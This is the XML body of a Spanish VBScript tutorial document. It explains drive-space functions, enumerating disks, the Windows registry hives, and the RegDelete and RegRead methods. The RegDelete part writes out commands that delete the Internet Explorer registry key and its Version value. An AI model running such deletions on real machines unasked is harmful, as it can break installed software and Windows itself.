      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>funciones con números</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>... Un ejemplo de uso de esta función es el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381"/>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fso</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C") variable = Fix(uni.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>TotalSize</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>/1024/1024)</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ta forma variable recibe el valor en MBytes sin decimales de espacio total de la unidad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aunque las unidades las decides tu.</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xta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>FreeSpace</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función da a variable un valor numérico que indica el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>espacio libre</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que tiene la unidad en Bytes. En general se usa igual que la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>TotalSize</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, solo que esta devuelve el espacio libre y no el total. Un ejemplo de uso de esta función es el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381"/>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fso</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C") variable = Fix(uni.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>FreeSpace</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>/1024/1024)</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A partir de estas dos, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>podemos sacar el espacio utilizado</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> restando el espacio libre al espacio total de la unidad. El siguiente ejemplo muestra tres MsgBox que indican el espacio total, el espacio libre y el espacio usado de la unidad C:</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Drive</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("C")</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="6178" w:type="dxa"/>
        <w:tblInd w:w="-1" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6178"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1708"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617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38" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="113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1 = </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Fix</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>uni.</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>TotalSize</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">/1024/1024) variable2 = </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Fix</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>(uni.</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>FreeSpace</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/1024/1024)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="41"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3 = variable1 - variable2 mensaje =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Espacio total: "&amp;variable1&amp;" MBytes") mensaje =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Espacio libre: "&amp;variable2&amp;" MBytes") mensaje =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Espacio usado: "&amp;variable3&amp;" MBytes")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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 xml:space="preserve">La séptima </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y última es una mezcla de varias que he echo yo para facilitar los datos. (En realidad es la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Drives</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que indica todos los discos en una colección. Yo lo que he echo es pasar esa colección a una variable normal.) Esta función crea una lista de todos los discos que tiene el PC y la guarda en la variable ListaDiscos. Cada disco va en una </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>línea diferente</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Así, se puede guardar esos datos en un archivo y luego ir leyéndolos línea por línea para operar en todos los discos. Recuerda usar la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>función IsReady</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para saber si están listos o no para escribi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sc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i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Drives</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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or Each </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 xml:space="preserve"> in sc</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ListaDiscos = ListaDiscos&amp;</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DriveLetter</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&amp;</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13)</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reo que al ser esta la tercera vez no viene mal recordar que el bucle </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>For</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se repite tantas veces como estructuras tiene la colección </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sc</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, y que cada vez es </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 xml:space="preserve"> quien tiene la estructura de esa repetición del bucle. Por tanto, podemos usar aquí también las funciones </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Name</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IsReady</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 etc. Si quieres saber más vuelve un poco atrás a la explicación de la función Files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="5"/>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Programación con Objetos: Otras Funciones Util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ueno, aquí voy a tratar unas cuantas funciones muy útiles. Las primeras se relacionan con el Registro de Windows. El registro de Windows es, como su propio nombre indica, un grupo de datos que dan información a los programas y al sistema. Modificar, borrar o crear datos en él sin saber lo que se hace puede ocasionar el incorrecto funcionamiento de Windows o alguno de sus programas. Para verlo, en el menú inicio, hacemos clic en ejecutar y escribimos regedit.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nos saldrá una pantalla más o menos así:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="74" w:right="-47"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5433060" cy="3013710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7813" name="Picture 7813"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="7813" name="Picture 7813"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5433060" cy="301371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la parte izquierda tenemos en forma de árbol unas carpetas que se llaman claves. Esto sirve para ordenar la información del registro. Al abrir una, nos aparece una lista de subclaves, y al abrir una de estas nos aparecerán más. Al mismo tiempo, una de esas claves puede tener una determinada información de cualquier tipo, que es lo que nos aparece a la derecha. Esta información puede hacer referencia a muchas cosas diferentes, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>como</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por ejemplo, el nombre de la papelera de reciclage o la versión de Windows que tienes. Las seis claves principales son:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="93"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HKEY_CLASSES_ROOT</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: Aquí tenemos registradas todas las extensiones, tipos de archivo. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="93"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: Detallado de las configuraciones del usuario actual. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: Configuraciones de nuestro PC tales como dónde está nuestro software y dónde los drivers instalados. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="93"/>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HKEY_USERS</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: Las configuraciones de los usuarios de ese PC (urls visitadas, aplicaciones favoritas...). </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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_CONFIG</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: Una especie de especificación de </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="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OCAL_MACHINE, más detalles de la configuración actual, pero la que esta ahora activa y no toda en general (la del usuario activo).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lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HKEY_DYN_DATA</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: La información "dinámica", se "forma" al encender el ordenador y desaparece al apagarlo.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Hay tres tipos de información que pueden guardar las clav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lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Valor de la cadena:</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Guarda una cadena con valor alfanumérico. Tienen delante el icono con las letras roja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Valor binario: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Guarda un valor binario. Es decir, una sucesión de 1 y 0, que significan algo. Tienen el símbolo con números azules. Es el único tipo de datos que es muy difícil, por no decir casi imposible, leer con VBScrip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lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Valor dword:</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Guarda un valor decimal o hexadecimal, es decir un numero. Tienen el símbolo con números azules, pero a diferencia del valor binario, el dato se guarda por ejemplo como 0x00000001(1) lo que significa que tiene el valor uno (mira solo el numero del paréntesi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No voy a hacer ahora un tutorial del registro de Windows, si lo queréis saber, investigad. Las funciones siguientes operan con el registro de Windows y lo modifican, y son lo que nos interesa ahora. Las siguientes funciones necesitan del objeto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WScript.Shell.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Estas funciones son las tres siguient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egDelete</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función borra una clave del registro o uno de sus valores según lo que le indiquemos. En este ejemplo de abajo se borra un valor de una clave porque al final no hay una barra (\). </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Si colocamos al final esa barra </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">estaremos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>indicando que queremos borrar una clave</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">.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si queremos borrar toda la clave de Internet Explorer pondríamos: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HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\".</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solo queremos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>borrar el valor</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Versión lo haríamos como en el ejemplo, es decir </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sin la barra final</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> porque no es una clav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lastRenderedPageBreak/>
        <w:t>ws</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.RegDelete</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HKEY_LOCAL_MACHINE\Software\Microsoft\Internet </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xplorer\Version"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>
        <w:ind w:left="93"/>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La segund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egRead</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función lee el valor que le indiquemos. Delante de la función colocamos una variable que se encargará de guardar el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
